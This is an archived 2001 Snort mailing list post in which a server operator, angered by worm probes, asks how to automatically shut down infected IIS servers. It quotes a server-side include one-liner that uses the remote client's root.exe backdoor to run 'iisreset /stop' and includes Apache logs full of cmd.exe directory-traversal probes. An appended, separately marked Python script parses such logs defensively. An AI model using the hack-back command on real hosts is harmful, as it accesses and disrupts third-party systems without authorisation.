Snort mailing list archives
Shut them down, I have had enough...
From: "Franki" <franki () gshop com au>
Date: Wed, 19 Sep 2001 15:03:27 +0800
Hi all,

I have seen in the past a PHP script that would shut down infected IIS servers that are trying to infect Linux boxes. I haven't done it, because I didn't really think it was that nice a thing to do... This is the one I saw...
1) Create a file called default.ida, in there add this:

<!--#exec cmd="lynx -source http://$REMOTE_ADDR/scripts/root.exe?/c+iisreset+/stop"-->

On one line, if it wraps in your mail client....

2) Then in your httpd.conf or similar... add this

AddType text/html .ida
AddHandler server-parsed .ida
But I checked my personal server this morning and the httpd error log looks like this (see the end of the email).

Anyway, I'd like to set up the server to shut down any IIS box that asks for cmd.exe or root.exe. Does anyone know how this can be done using either Perl or PHP??? Has anyone already done it? If so, where can I find it???

I am tired of this. I have very limited bandwidth, and even if it isn't doing any damage, it's chewing up the bandwidth.. and costing me money. As far as I am now concerned, they have three choices: either patch their server, pay my bandwidth bill, or get their servers shut down a lot...

Any help would be much appreciated.

Regards
Frank
Perth WA

[Wed Sep 19 14:47:27 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/c/winnt/system32/cmd.exe
[Wed Sep 19 14:47:28 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/d/winnt/system32/cmd.exe
[Wed Sep 19 14:47:31 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:47:33 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:47:34 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:47:40 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/msadc/..%5c../..%5c../..%5c/..A../..A../..A../winnt/system32/cmd.exe
[Wed Sep 19 14:47:42 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..A../winnt/system32/cmd.exe
[Wed Sep 19 14:48:00 2001] [error] [client 203.47.134.211] File does not exist: /var/www/html/otherwebs/epay/default.ida
[Wed Sep 19 14:48:13 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/root.exe
[Wed Sep 19 14:48:14 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/MSADC/root.exe
[Wed Sep 19 14:48:15 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/c/winnt/system32/cmd.exe
[Wed Sep 19 14:48:16 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/d/winnt/system32/cmd.exe
[Wed Sep 19 14:48:18 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:48:19 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:48:21 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:48:23 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/msadc/..%5c../..%5c../..%5c/..A../..A../..A../winnt/system32/cmd.exe
[Wed Sep 19 14:48:24 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..A../winnt/system32/cmd.exe

[root@mail httpd]# tail -50 error_log
[Wed Sep 19 14:53:18 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:53:18 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:53:19 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:53:20 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/msadc/..%5c../..%5c../..%5c/..A../..A../..A../winnt/system32/cmd.exe
[Wed Sep 19 14:53:20 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/scripts/..A../winnt/system32/cmd.exe
[Wed Sep 19 14:53:20 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..%2f../winnt/system32/cmd.exe
[Wed Sep 19 14:53:20 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/otherwebs/ezetax/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:53:21 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/scripts/..A?../winnt/system32/cmd.exe
[Wed Sep 19 14:53:21 2001] [error] [client 203.176.30.78] File does not exist: /var/www/html/otherwebs/ezetax/scripts/..%2f../winnt/system32/cmd.exe
[Wed Sep 19 14:53:22 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/scripts/..A../winnt/system32/cmd.exe

_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users
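
Added example, not part of the original post: a Python sketch that reads error_log entries in the format shown above and counts requests for cmd.exe, root.exe and default.ida per client, so the noisiest sources can be filtered at the firewall or reported to their network's abuse contact. The function names, labels, threshold and sample lines (documentation addresses) are constructed for illustration.

```python
import re
from collections import defaultdict

# Apache error_log entry in the format shown in the post.
ENTRY = re.compile(
    r"\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<ip>[\d.]+)\] "
    r"File does not exist: (?P<path>\S+)"
)

# File names the post's log shows being probed; labels are hypothetical.
PROBES = {
    "cmd.exe": "cmd.exe-probe",
    "root.exe": "root.exe-probe",
    "default.ida": "default.ida-probe",
}


def classify(path):
    """Return a probe label for a requested path, or None for an ordinary 404."""
    return PROBES.get(path.rsplit("/", 1)[-1].lower())


def summarize(lines, threshold=3):
    """Count probe hits per client; flag clients at or above the threshold."""
    hits = defaultdict(lambda: defaultdict(int))
    for line in lines:
        m = ENTRY.search(line)
        if not m:
            continue  # not a "File does not exist" entry
        label = classify(m.group("path"))
        if label:
            hits[m.group("ip")][label] += 1
    report = {ip: dict(kinds) for ip, kinds in hits.items()}
    flagged = sorted(ip for ip, kinds in report.items()
                     if sum(kinds.values()) >= threshold)
    return report, flagged


# Constructed sample input: same layout as the post's log, documentation IPs.
SAMPLE = """\
[Wed Sep 19 14:47:27 2001] [error] [client 192.0.2.10] File does not exist: /var/www/html/c/winnt/system32/cmd.exe
[Wed Sep 19 14:47:31 2001] [error] [client 192.0.2.10] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:48:00 2001] [error] [client 198.51.100.7] File does not exist: /var/www/html/otherwebs/epay/default.ida
[Wed Sep 19 14:48:13 2001] [error] [client 192.0.2.10] File does not exist: /var/www/html/scripts/root.exe
[Wed Sep 19 14:49:02 2001] [error] [client 203.0.113.5] File does not exist: /var/www/html/favicon.ico
""".splitlines()

if __name__ == "__main__":
    report, flagged = summarize(SAMPLE)
    for ip in flagged:
        print(ip, report[ip])
```
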